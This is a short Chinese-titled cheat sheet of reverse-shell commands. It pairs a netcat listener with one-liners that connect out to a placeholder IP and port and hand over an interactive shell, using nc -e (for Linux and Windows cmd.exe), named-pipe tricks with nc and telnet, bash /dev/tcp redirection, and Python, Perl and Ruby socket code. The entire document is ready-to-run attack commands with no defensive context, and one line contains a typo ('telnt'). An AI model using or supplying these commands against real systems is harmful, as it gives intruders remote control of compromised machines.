反弹Shell

#client
nc -vlp <port>
#server
#nc
nc -e /bin/sh <target IP> <port>
nc.exe -e C:\WINDOWS\system32\cmd.exe <target IP> <port>
mkfifo bd;cat bd | /bin/sh -i 2>&1 | nc <target IP> <port> >bd
mknod bd p;cat bd|/bin/sh -i 2>&1|nc  <target IP> <port> >bd
#telnet
mkfifo bd;cat bd|/bin/sh -i 2>&1|telnet  <target IP> <port> >bd
telnet <target IP> <port1> | /bin/sh |telnt <target IP> <port2>
#bash
bash -c "bash -i &>/dev/tcp/<target IP>/<port> 0>&1"
bash -c "exec 9<> /dev/tcp/localhost/8080&&exec 0<&9&&exec 1>&9 2>&1&&/bin/bash --noprofile"
#python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<target ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
#perl
perl -e 'use Socket;$i="<target ip>";$p=<port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
#ruby
ruby -rsocket -e'f=TCPSocket.open("<target ip>",<port>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'